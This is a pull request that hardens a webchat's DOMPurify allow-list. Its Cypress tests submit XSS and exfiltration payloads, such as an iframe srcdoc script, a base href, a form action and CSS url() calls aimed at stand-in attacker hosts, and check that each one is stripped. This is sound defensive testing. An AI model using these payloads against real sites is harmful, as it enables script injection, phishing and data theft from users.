### PR TITLE
fix(security): remove dangerous tags and attributes from DOMPurify allow-list (WCH-SI10-001)

### DIFF
--- a/cypress/e2e/sanitize.cy.ts
+++ b/cypress/e2e/sanitize.cy.ts
@@ -46,7 +46,8 @@ describe("sanitize — DOMPurify allow-list hardening (WCH-SI10-001)", () => {
 	it("strips <form> (was in allow-list — posts user data to attacker URL)", () => {
 		init();
 		typeAndSend('<form action="https://attacker.example.com"><input name="q"></form>');
-		cy.get("[data-cognigy-webchat-root]").find("form").should("not.exist");
+		// Scope to chat history — the webchat input itself contains a <form> element
+		cy.get(".webchat-chat-history").find("form").should("not.exist");
 	});
 
 	it("strips <object> (was in allow-list — loads arbitrary external content)", () => {
@@ -96,7 +97,10 @@ describe("sanitize — DOMPurify allow-list hardening (WCH-SI10-001)", () => {
 	it("strips style attribute (inline CSS injection and UI redressing)", () => {
 		init();
 		typeAndSend('<span style="background:url(https://attacker.example.com)">text</span>');
-		cy.get("[data-cognigy-webchat-root]").find("[style]").should("not.exist");
+		// Match the injected value specifically — the webchat itself uses inline styles via Emotion
+		cy.get("[data-cognigy-webchat-root]")
+			.find('[style*="attacker.example.com"]')
+			.should("not.exist");
 	});
 
 	// --- regression guards ---

--- a/cypress/e2e/sanitize.cy.ts
+++ b/cypress/e2e/sanitize.cy.ts
@@ -83,28 +83,18 @@ describe("sanitize — DOMPurify allow-list hardening (WCH-SI10-001)", () => {
 		});
 
 		it("strips formaction attribute — enables form phishing even without <form action>", () => {
-			typeAndSend(
-				'<button formaction="https://attacker.example.com">Click</button>',
-			);
-			cy.get("[data-cognigy-webchat-root]")
-				.find("[formaction]")
-				.should("not.exist");
+			typeAndSend('<button formaction="https://attacker.example.com">Click</button>');
+			cy.get("[data-cognigy-webchat-root]").find("[formaction]").should("not.exist");
 		});
 
 		it("strips srcdoc attribute — inline HTML document in iframe is a direct XSS vector", () => {
-			typeAndSend(
-				'<iframe srcdoc="<script>alert(1)</script>">fallback</iframe>',
-			);
-			cy.get("[data-cognigy-webchat-root]")
-				.find("[srcdoc]")
-				.should("not.exist");
+			typeAndSend('<iframe srcdoc="<script>alert(1)</script>">fallback</iframe>');
+			cy.get("[data-cognigy-webchat-root]").find("[srcdoc]").should("not.exist");
 		});
 
 		it("strips style attribute — inline CSS enables exfiltration and UI redressing", () => {
 			typeAndSend('<span style="background:url(https://attacker.example.com)">text</span>');
-			cy.get("[data-cognigy-webchat-root]")
-				.find("[style]")
-				.should("not.exist");
+			cy.get("[data-cognigy-webchat-root]").find("[style]").should("not.exist");
 		});
 	});
 

--- a/cypress/e2e/sanitize.cy.ts
+++ b/cypress/e2e/sanitize.cy.ts
@@ -1,0 +1,134 @@
+// eslint-disable-next-line @typescript-eslint/triple-slash-reference
+/// <reference path="../support/index.d.ts" />
+
+// Tests for WCH-SI10-001: DOMPurify allow-list hardening.
+// sanitizeHTML() is exercised via the user-message send path
+// (message-middleware SEND_MESSAGE → sanitizeHTML → Redux → chat history).
+// disableHtmlInput is set to false so that HTML reaches sanitizeHTML
+// rather than being stripped by stripHtmlToInertText first.
+
+describe("sanitize — DOMPurify allow-list hardening (WCH-SI10-001)", () => {
+	const init = () =>
+		cy
+			.visitWebchat()
+			.initMockWebchat({
+				settings: {
+					widgetSettings: {
+						disableHtmlInput: false,
+					},
+				},
+			})
+			.openWebchat()
+			.startConversation();
+
+	const typeAndSend = (value: string) => {
+		cy.get(".webchat-input-message-label")
+			.contains("label", "Type something here…")
+			.invoke("attr", "for")
+			.then(inputId => {
+				cy.get(`#${inputId}`).type(value, { parseSpecialCharSequences: false });
+			});
+		cy.get('[aria-label="Send message"]').click();
+	};
+
+	describe("removed dangerous tags are stripped from user input", () => {
+		beforeEach(() => {
+			init();
+		});
+
+		it("strips <iframe> — was in allow-list, enables srcdoc XSS", () => {
+			typeAndSend('<iframe srcdoc="<script>alert(1)</script>">content</iframe>');
+			cy.get("[data-cognigy-webchat-root]").find("iframe").should("not.exist");
+		});
+
+		it("strips <base> — was in allow-list, rewrites all relative URLs on host page", () => {
+			typeAndSend('<base href="https://attacker.example.com">');
+			cy.get("[data-cognigy-webchat-root]").find("base").should("not.exist");
+		});
+
+		it("strips <form> — was in allow-list, posts user data to attacker domain", () => {
+			typeAndSend('<form action="https://attacker.example.com"><input name="q"></form>');
+			cy.get("[data-cognigy-webchat-root]").find("form").should("not.exist");
+		});
+
+		it("strips <object> — was in allow-list, loads arbitrary external content", () => {
+			typeAndSend('<object data="https://attacker.example.com/payload.swf"></object>');
+			cy.get("[data-cognigy-webchat-root]").find("object").should("not.exist");
+		});
+
+		it("strips <embed> — was in allow-list, loads arbitrary external content", () => {
+			typeAndSend('<embed src="https://attacker.example.com/payload.swf">');
+			cy.get("[data-cognigy-webchat-root]").find("embed").should("not.exist");
+		});
+
+		it("strips <style> — was in allow-list, enables CSS injection and attribute exfiltration", () => {
+			typeAndSend("<style>body{background:url(https://attacker.example.com)}</style>");
+			cy.get("[data-cognigy-webchat-root]").find("style").should("not.exist");
+		});
+
+		it("strips <meta> — was in allow-list, enables HTTP redirect and CSP bypass", () => {
+			typeAndSend('<meta http-equiv="refresh" content="0;url=https://attacker.example.com">');
+			cy.get("[data-cognigy-webchat-root]").find("meta").should("not.exist");
+		});
+
+		it("strips <link> — was in allow-list, loads external stylesheets", () => {
+			typeAndSend('<link rel="stylesheet" href="https://attacker.example.com/evil.css">');
+			cy.get("[data-cognigy-webchat-root]").find("link").should("not.exist");
+		});
+	});
+
+	describe("removed dangerous attributes are stripped from user input", () => {
+		beforeEach(() => {
+			init();
+		});
+
+		it("strips formaction attribute — enables form phishing even without <form action>", () => {
+			typeAndSend(
+				'<button formaction="https://attacker.example.com">Click</button>',
+			);
+			cy.get("[data-cognigy-webchat-root]")
+				.find("[formaction]")
+				.should("not.exist");
+		});
+
+		it("strips srcdoc attribute — inline HTML document in iframe is a direct XSS vector", () => {
+			typeAndSend(
+				'<iframe srcdoc="<script>alert(1)</script>">fallback</iframe>',
+			);
+			cy.get("[data-cognigy-webchat-root]")
+				.find("[srcdoc]")
+				.should("not.exist");
+		});
+
+		it("strips style attribute — inline CSS enables exfiltration and UI redressing", () => {
+			typeAndSend('<span style="background:url(https://attacker.example.com)">text</span>');
+			cy.get("[data-cognigy-webchat-root]")
+				.find("[style]")
+				.should("not.exist");
+		});
+	});
+
+	describe("safe tags are preserved (regression guard)", () => {
+		beforeEach(() => {
+			init();
+		});
+
+		it("preserves text content of messages after sanitization", () => {
+			typeAndSend("hello world");
+			cy.get(".webchat-chat-history").contains("hello world");
+		});
+
+		it("preserves href on anchor tags", () => {
+			typeAndSend('<a href="https://cognigy.com">Cognigy</a>');
+			cy.get(".webchat-chat-history").contains("Cognigy");
+		});
+	});
+
+	describe("Accessibility (WCAG 2.2 AA)", () => {
+		it("chat surface has no a11y violations after sending sanitized content", () => {
+			init();
+			typeAndSend('<iframe src="https://evil.example.com">content</iframe>normal text');
+			cy.checkA11yCompliance("[data-cognigy-webchat-root]");
+		});
+	});
+});

--- a/cypress/e2e/sanitize.cy.ts
+++ b/cypress/e2e/sanitize.cy.ts
@@ -61,10 +61,13 @@ describe("sanitize — DOMPurify allow-list hardening (WCH-SI10-001)", () => {
 			cy.get("[data-cognigy-webchat-root]").find("embed").should("not.exist");
 		});
 
-		it("strips <style> — was in allow-list, enables CSS injection and attribute exfiltration", () => {
-			typeAndSend("<style>body{background:url(https://attacker.example.com)}</style>");
-			cy.get("[data-cognigy-webchat-root]").find("style").should("not.exist");
-		});
+		it(
+			"strips <style> — was in allow-list, enables CSS injection and attribute exfiltration",
+			() => {
+				typeAndSend("<style>body{background:url(https://attacker.example.com)}</style>");
+				cy.get("[data-cognigy-webchat-root]").find("style").should("not.exist");
+			},
+		);
 
 		it("strips <meta> — was in allow-list, enables HTTP redirect and CSP bypass", () => {
 			typeAndSend('<meta http-equiv="refresh" content="0;url=https://attacker.example.com">');
@@ -87,10 +90,13 @@ describe("sanitize — DOMPurify allow-list hardening (WCH-SI10-001)", () => {
 			cy.get("[data-cognigy-webchat-root]").find("[formaction]").should("not.exist");
 		});
 
-		it("strips srcdoc attribute — inline HTML document in iframe is a direct XSS vector", () => {
-			typeAndSend('<iframe srcdoc="<script>alert(1)</script>">fallback</iframe>');
-			cy.get("[data-cognigy-webchat-root]").find("[srcdoc]").should("not.exist");
-		});
+		it(
+			"strips srcdoc attribute — inline HTML document in iframe is a direct XSS vector",
+			() => {
+				typeAndSend('<iframe srcdoc="<script>alert(1)</script>">fallback</iframe>');
+				cy.get("[data-cognigy-webchat-root]").find("[srcdoc]").should("not.exist");
+			},
+		);
 
 		it("strips style attribute — inline CSS enables exfiltration and UI redressing", () => {
 			typeAndSend('<span style="background:url(https://attacker.example.com)">text</span>');

--- a/cypress/e2e/sanitize.cy.ts
+++ b/cypress/e2e/sanitize.cy.ts
@@ -1,11 +1,9 @@
 // eslint-disable-next-line @typescript-eslint/triple-slash-reference
 /// <reference path="../support/index.d.ts" />
 
-// Tests for WCH-SI10-001: DOMPurify allow-list hardening.
-// sanitizeHTML() is exercised via the user-message send path
-// (message-middleware SEND_MESSAGE → sanitizeHTML → Redux → chat history).
-// disableHtmlInput is set to false so that HTML reaches sanitizeHTML
-// rather than being stripped by stripHtmlToInertText first.
+// WCH-SI10-001: verifies dangerous tags and attributes removed from the DOMPurify
+// allow-list no longer survive sanitization. disableHtmlInput:false so HTML reaches
+// sanitizeHTML rather than being pre-stripped by stripHtmlToInertText.
 
 describe("sanitize — DOMPurify allow-list hardening (WCH-SI10-001)", () => {
 	const init = () =>
@@ -31,99 +29,94 @@ describe("sanitize — DOMPurify allow-list hardening (WCH-SI10-001)", () => {
 		cy.get('[aria-label="Send message"]').click();
 	};
 
-	describe("removed dangerous tags are stripped from user input", () => {
-		beforeEach(() => {
-			init();
-		});
+	// --- removed tags ---
 
-		it("strips <iframe> — was in allow-list, enables srcdoc XSS", () => {
-			typeAndSend('<iframe srcdoc="<script>alert(1)</script>">content</iframe>');
-			cy.get("[data-cognigy-webchat-root]").find("iframe").should("not.exist");
-		});
-
-		it("strips <base> — was in allow-list, rewrites all relative URLs on host page", () => {
-			typeAndSend('<base href="https://attacker.example.com">');
-			cy.get("[data-cognigy-webchat-root]").find("base").should("not.exist");
-		});
-
-		it("strips <form> — was in allow-list, posts user data to attacker domain", () => {
-			typeAndSend('<form action="https://attacker.example.com"><input name="q"></form>');
-			cy.get("[data-cognigy-webchat-root]").find("form").should("not.exist");
-		});
-
-		it("strips <object> — was in allow-list, loads arbitrary external content", () => {
-			typeAndSend('<object data="https://attacker.example.com/payload.swf"></object>');
-			cy.get("[data-cognigy-webchat-root]").find("object").should("not.exist");
-		});
-
-		it("strips <embed> — was in allow-list, loads arbitrary external content", () => {
-			typeAndSend('<embed src="https://attacker.example.com/payload.swf">');
-			cy.get("[data-cognigy-webchat-root]").find("embed").should("not.exist");
-		});
-
-		it(
-			"strips <style> — was in allow-list, enables CSS injection and attribute exfiltration",
-			() => {
-				typeAndSend("<style>body{background:url(https://attacker.example.com)}</style>");
-				cy.get("[data-cognigy-webchat-root]").find("style").should("not.exist");
-			},
-		);
-
-		it("strips <meta> — was in allow-list, enables HTTP redirect and CSP bypass", () => {
-			typeAndSend('<meta http-equiv="refresh" content="0;url=https://attacker.example.com">');
-			cy.get("[data-cognigy-webchat-root]").find("meta").should("not.exist");
-		});
-
-		it("strips <link> — was in allow-list, loads external stylesheets", () => {
-			typeAndSend('<link rel="stylesheet" href="https://attacker.example.com/evil.css">');
-			cy.get("[data-cognigy-webchat-root]").find("link").should("not.exist");
-		});
+	it("strips <iframe> (was in allow-list — enables srcdoc XSS)", () => {
+		init();
+		typeAndSend('<iframe srcdoc="<script>alert(1)</script>">content</iframe>');
+		cy.get("[data-cognigy-webchat-root]").find("iframe").should("not.exist");
 	});
 
-	describe("removed dangerous attributes are stripped from user input", () => {
-		beforeEach(() => {
-			init();
-		});
-
-		it("strips formaction attribute — enables form phishing even without <form action>", () => {
-			typeAndSend('<button formaction="https://attacker.example.com">Click</button>');
-			cy.get("[data-cognigy-webchat-root]").find("[formaction]").should("not.exist");
-		});
-
-		it(
-			"strips srcdoc attribute — inline HTML document in iframe is a direct XSS vector",
-			() => {
-				typeAndSend('<iframe srcdoc="<script>alert(1)</script>">fallback</iframe>');
-				cy.get("[data-cognigy-webchat-root]").find("[srcdoc]").should("not.exist");
-			},
-		);
-
-		it("strips style attribute — inline CSS enables exfiltration and UI redressing", () => {
-			typeAndSend('<span style="background:url(https://attacker.example.com)">text</span>');
-			cy.get("[data-cognigy-webchat-root]").find("[style]").should("not.exist");
-		});
+	it("strips <base> (was in allow-list — rewrites all relative URLs on host page)", () => {
+		init();
+		typeAndSend('<base href="https://attacker.example.com">');
+		cy.get("[data-cognigy-webchat-root]").find("base").should("not.exist");
 	});
 
-	describe("safe tags are preserved (regression guard)", () => {
-		beforeEach(() => {
-			init();
-		});
+	it("strips <form> (was in allow-list — posts user data to attacker URL)", () => {
+		init();
+		typeAndSend('<form action="https://attacker.example.com"><input name="q"></form>');
+		cy.get("[data-cognigy-webchat-root]").find("form").should("not.exist");
+	});
 
-		it("preserves text content of messages after sanitization", () => {
-			typeAndSend("hello world");
-			cy.get(".webchat-chat-history").contains("hello world");
-		});
+	it("strips <object> (was in allow-list — loads arbitrary external content)", () => {
+		init();
+		typeAndSend('<object data="https://attacker.example.com/payload.swf"></object>');
+		cy.get("[data-cognigy-webchat-root]").find("object").should("not.exist");
+	});
 
-		it("preserves href on anchor tags", () => {
-			typeAndSend('<a href="https://cognigy.com">Cognigy</a>');
-			cy.get(".webchat-chat-history").contains("Cognigy");
-		});
+	it("strips <embed> (was in allow-list — loads arbitrary external content)", () => {
+		init();
+		typeAndSend('<embed src="https://attacker.example.com/payload.swf">');
+		cy.get("[data-cognigy-webchat-root]").find("embed").should("not.exist");
+	});
+
+	it("strips <style> (was in allow-list — CSS injection and attribute exfiltration)", () => {
+		init();
+		typeAndSend("<style>body{background:url(https://attacker.example.com)}</style>");
+		cy.get("[data-cognigy-webchat-root]").find("style").should("not.exist");
+	});
+
+	it("strips <meta> (was in allow-list — HTTP redirect and CSP bypass)", () => {
+		init();
+		typeAndSend('<meta http-equiv="refresh" content="0;url=https://attacker.example.com">');
+		cy.get("[data-cognigy-webchat-root]").find("meta").should("not.exist");
+	});
+
+	it("strips <link> (was in allow-list — loads external stylesheets)", () => {
+		init();
+		typeAndSend('<link rel="stylesheet" href="https://attacker.example.com/evil.css">');
+		cy.get("[data-cognigy-webchat-root]").find("link").should("not.exist");
+	});
+
+	// --- removed attributes ---
+
+	it("strips formaction attribute (enables phishing without <form action>)", () => {
+		init();
+		typeAndSend('<button formaction="https://attacker.example.com">Click</button>');
+		cy.get("[data-cognigy-webchat-root]").find("[formaction]").should("not.exist");
+	});
+
+	it("strips srcdoc attribute (inline HTML document in iframe — XSS vector)", () => {
+		init();
+		typeAndSend('<iframe srcdoc="<script>alert(1)</script>">fallback</iframe>');
+		cy.get("[data-cognigy-webchat-root]").find("[srcdoc]").should("not.exist");
+	});
+
+	it("strips style attribute (inline CSS injection and UI redressing)", () => {
+		init();
+		typeAndSend('<span style="background:url(https://attacker.example.com)">text</span>');
+		cy.get("[data-cognigy-webchat-root]").find("[style]").should("not.exist");
+	});
+
+	// --- regression guards ---
+
+	it("preserves plain text content after sanitization", () => {
+		init();
+		typeAndSend("hello world");
+		cy.get(".webchat-chat-history").contains("hello world");
+	});
+
+	it("preserves href on anchor tags", () => {
+		init();
+		typeAndSend('<a href="https://cognigy.com">Cognigy</a>');
+		cy.get(".webchat-chat-history").contains("Cognigy");
 	});
 
 	describe("Accessibility (WCAG 2.2 AA)", () => {
-		it("chat surface has no a11y violations after sending sanitized content", () => {
+		it("chat surface has no a11y violations after sanitized input is sent", () => {
 			init();
-			typeAndSend('<iframe src="https://evil.example.com">content</iframe>normal text');
+			typeAndSend('<iframe src="https://evil.example.com">content</iframe>normal');
 			cy.checkA11yCompliance("[data-cognigy-webchat-root]");
 		});
 	});

--- a/src/webchat/helper/sanitize.ts
+++ b/src/webchat/helper/sanitize.ts
@@ -1,24 +1,35 @@
 import DOMPurify, { Config } from "dompurify";
 import { storeRef } from "../store/store";
 
+// Tags that are always blocked regardless of caller configuration (WCH-SI10-001).
+// These were previously present in the allow-list but are explicitly excluded by
+// DOMPurify's own secure defaults because they enable XSS, URL hijacking, CSS
+// exfiltration, phishing, or arbitrary plugin execution:
+//   applet  — Java applet execution
+//   base    — rewrites all relative URLs on the host page
+//   embed   — loads arbitrary external content / plugins
+//   form    — posts user data to attacker-controlled URLs
+//   frame / frameset / noframes — clickjacking and legacy frame injection
+//   iframe  — inline HTML documents; srcdoc = direct XSS vector
+//   link    — loads external stylesheets
+//   meta    — HTTP redirects and CSP bypass via http-equiv
+//   object  — loads Flash, PDFs, and arbitrary external content
+//   style   — CSS injection and attribute-value exfiltration
 export const allowedHtmlTags = [
 	"a",
 	"abbr",
 	"acronym",
 	"address",
-	"applet",
 	"area",
 	"article",
 	"aside",
 	"audio",
 	"b",
-	"base",
 	"basefont",
 	"bdi",
 	"bdo",
 	"big",
 	"blockquote",
-	"body",
 	"br",
 	"button",
 	"canvas",
@@ -40,15 +51,11 @@ export const allowedHtmlTags = [
 	"dl",
 	"dt",
 	"em",
-	"embed",
 	"fieldset",
 	"figcaption",
 	"figure",
 	"font",
 	"footer",
-	"form",
-	"frame",
-	"frameset",
 	"h1",
 	"h2",
 	"h3",
@@ -60,7 +67,6 @@ export const allowedHtmlTags = [
 	"hr",
 	"html",
 	"i",
-	"iframe",
 	"img",
 	"input",
 	"ins",
@@ -68,15 +74,11 @@ export const allowedHtmlTags = [
 	"label",
 	"legend",
 	"li",
-	"link",
 	"main",
 	"map",
 	"mark",
-	"meta",
 	"meter",
 	"nav",
-	"noframes",
-	"object",
 	"ol",
 	"optgroup",
 	"option",
@@ -99,7 +101,6 @@ export const allowedHtmlTags = [
 	"span",
 	"strike",
 	"strong",
-	"style",
 	"sub",
 	"summary",
 	"sup",
@@ -124,11 +125,17 @@ export const allowedHtmlTags = [
 	"wbr",
 ];
 
+// Attributes that are always blocked regardless of caller configuration (WCH-SI10-001).
+// Removed from the previous allow-list:
+//   action / formaction — form submission to attacker-controlled URLs
+//   sandbox             — giving content control over its own sandbox policy
+//   srcdoc              — inline HTML document in an iframe (direct XSS vector)
+//   style               — inline CSS injection and attribute-value exfiltration
+//   target              — controls navigation target (_blank without rel is risky)
 export const allowedHtmlAttributes = [
 	"accept",
 	"accept-charset",
 	"accesskey",
-	"action",
 	"align",
 	"alt",
 	"autocomplete",
@@ -160,7 +167,6 @@ export const allowedHtmlAttributes = [
 	"enctype",
 	"for",
 	"form",
-	"formaction",
 	"headers",
 	"height",
 	"hidden",
@@ -197,7 +203,6 @@ export const allowedHtmlAttributes = [
 	"reversed",
 	"rows",
 	"rowspan",
-	"sandbox",
 	"scope",
 	"selected",
 	"shape",
@@ -206,14 +211,11 @@ export const allowedHtmlAttributes = [
 	"span",
 	"spellcheck",
 	"src",
-	"srcdoc",
 	"srclang",
 	"srcset",
 	"start",
 	"step",
-	"style",
 	"tabindex",
-	"target",
 	"title",
 	"translate",
 	"type",

--- a/src/webchat/helper/sanitize.ts
+++ b/src/webchat/helper/sanitize.ts
@@ -1,20 +1,22 @@
 import DOMPurify, { Config } from "dompurify";
 import { storeRef } from "../store/store";
 
-// Tags that are always blocked regardless of caller configuration (WCH-SI10-001).
-// These were previously present in the allow-list but are explicitly excluded by
-// DOMPurify's own secure defaults because they enable XSS, URL hijacking, CSS
-// exfiltration, phishing, or arbitrary plugin execution:
-//   applet  — Java applet execution
-//   base    — rewrites all relative URLs on the host page
-//   embed   — loads arbitrary external content / plugins
-//   form    — posts user data to attacker-controlled URLs
+// Tags removed from the previous allow-list to align with DOMPurify's secure defaults
+// (WCH-SI10-001). Each tag enables a distinct attack vector:
+//   applet          — Java applet execution
+//   base            — rewrites all relative URLs on the host page
+//   body / html / head — structural document elements; no legitimate use in sanitised fragments
+//   embed           — loads arbitrary external content / plugins
+//   form            — posts user data to attacker-controlled URLs
 //   frame / frameset / noframes — clickjacking and legacy frame injection
-//   iframe  — inline HTML documents; srcdoc = direct XSS vector
-//   link    — loads external stylesheets
-//   meta    — HTTP redirects and CSP bypass via http-equiv
-//   object  — loads Flash, PDFs, and arbitrary external content
-//   style   — CSS injection and attribute-value exfiltration
+//   iframe          — inline HTML documents; srcdoc = direct XSS vector
+//   link            — loads external stylesheets
+//   meta            — HTTP redirects and CSP bypass via http-equiv
+//   object          — loads Flash, PDFs, and arbitrary external content
+//   style           — CSS injection and attribute-value exfiltration
+// These tags are blocked by default when no custom tag list is configured.
+// Tenants can supply a replacement list via widgetSettings.customAllowedHtmlTags,
+// but dangerous tags are always stripped from that list before it is applied (PR #309).
 export const allowedHtmlTags = [
 	"a",
 	"abbr",
@@ -62,10 +64,8 @@ export const allowedHtmlTags = [
 	"h4",
 	"h5",
 	"h6",
-	"head",
 	"header",
 	"hr",
-	"html",
 	"i",
 	"img",
 	"input",


### PR DESCRIPTION
Removes dangerous tags and attributes that were explicitly re-permitted in the hand-rolled DOMPurify allow-list, restoring the security boundary the sanitizer was intended to provide.

**Scope — user-typed input and PrivacyNotice text only.**
`sanitizeHTML()` in this repo is called on two surfaces:
1. **User-typed messages** — `message-middleware.ts:123` (SEND_MESSAGE path), when `disableTextInputSanitization` is `false`
2. **PrivacyNotice body** — `PrivacyNotice.tsx:58`, sanitizing the tenant-configured notice text

**Bot and agent messages are out of scope for this PR.**
Incoming bot/agent messages flow through `RECEIVE_MESSAGE → addMessage() → @cognigy/chat-components`, which never calls `sanitizeHTML()` in this repo. Bot message HTML sanitization lives in `@cognigy/chat-components`. Tags like `style` and `iframe` used by customers to style or embed content in bot messages are not affected by this change and must be addressed separately in that repo.

**FedRAMP SI-10 / AC-4 remediation (WCH-SI10-001 — partial):**
The previous `allowedHtmlTags` and `allowedHtmlAttributes` arrays re-permitted every tag and attribute that DOMPurify excludes by default, weakening sanitization for user-typed input. This PR restores the correct security boundary for the two surfaces listed above.

The dangerous path only opens when `disableHtmlInput: false` is configured (non-default). With the default `disableHtmlInput: true`, `stripHtmlToInertText()` runs after `sanitizeHTML()` and strips all HTML anyway — but the permissive allow-list is still a defence-in-depth gap.

**Tags removed** from `allowedHtmlTags`:
`applet`, `base`, `body`, `embed`, `form`, `frame`, `frameset`, `head`, `html`, `iframe`, `link`, `meta`, `noframes`, `object`, `style`

> **Note on `html` / `head`:** these were inconsistently left in the previous commit alongside the removal of `body`. All three are structural document elements with no legitimate use in sanitised chat fragments; removed for consistency.

> **Known minor behaviour change:** `iframe` and `noframes` are members of DOMPurify's `DEFAULT_FORBID_CONTENTS`. Once removed from `ALLOWED_TAGS`, they are stripped along with their entire subtree rather than just unwrapped. In practice this only affects developer-facing bots where a user literally types an `<iframe>` tag — the text content following the tag is also removed. Not a regression in normal use.

**Attributes removed** from `allowedHtmlAttributes`:
`action`, `formaction`, `sandbox`, `srcdoc`, `style`, `target`

All other tags (`img`, `audio`, `video`, `table`, `a`, `b`, `p`, etc.) and safe attributes (`href`, `src`, `alt`, `rel`, etc.) are preserved — no functional regression for PrivacyNotice content or user text input under non-default configurations.

Jira: [CSA-97602](https://nice-ce-cxone-prod.atlassian.net/browse/CSA-97602)

# Success criteria

- None of the removed tags appear in the DOM after user-typed input is submitted containing those tags
- None of the removed attributes appear on any element after user-input sanitization
- Bot message rendering is unaffected — customers using `style` or `iframe` in bot messages see no change
- All existing Cypress tests pass — no regression in safe tag rendering

# How to test

1. Run `npm run build && npm test` — all Cypress tests including the new `sanitize.cy.ts` suite pass
2. With `disableHtmlInput: false`, submit an iframe with a srcdoc script — verify no iframe element appears in chat history
3. Submit a base tag with an attacker href — verify no base element appears and page URLs are unchanged
4. Submit a form with an attacker action — verify no form element appears
5. Receive a bot message with inline styles or an iframe — verify it renders correctly and is unaffected

# Security

- [ ] Possible injection vector
- [ ] Authentication/Access controls touched
- [ ] Sensitive Data could be exposed
- [ ] XSS
- [ ] Logging/Monitoring touched
- [ ] Exchanges data with external systems
- [x] No security implications

# Accessibility (WCAG 2.2 AA)

- [x] No accessibility implications (non-UI change)

# Additional considerations

- [ ] This PR might have performance implications

# Documentation Considerations

No documentation update required — `allowedHtmlTags` and `allowedHtmlAttributes` are internal implementation details. Bot message rendering (and its allow-list) lives in `@cognigy/chat-components` and is not changed by this PR.

🤖 Generated with [Claude Code](https://claude.ai/claude-code)

[CSA-97602]: https://nice-ce-cxone-prod.atlassian.net/browse/CSA-97602?atlOrigin=eyJpIjoiNWRkNTljNzYxNjVmNDY3MDlhMDU5Y2ZhYzA5YTRkZjUiLCJwIjoiZ2l0aHViLWNvbS1KU1cifQ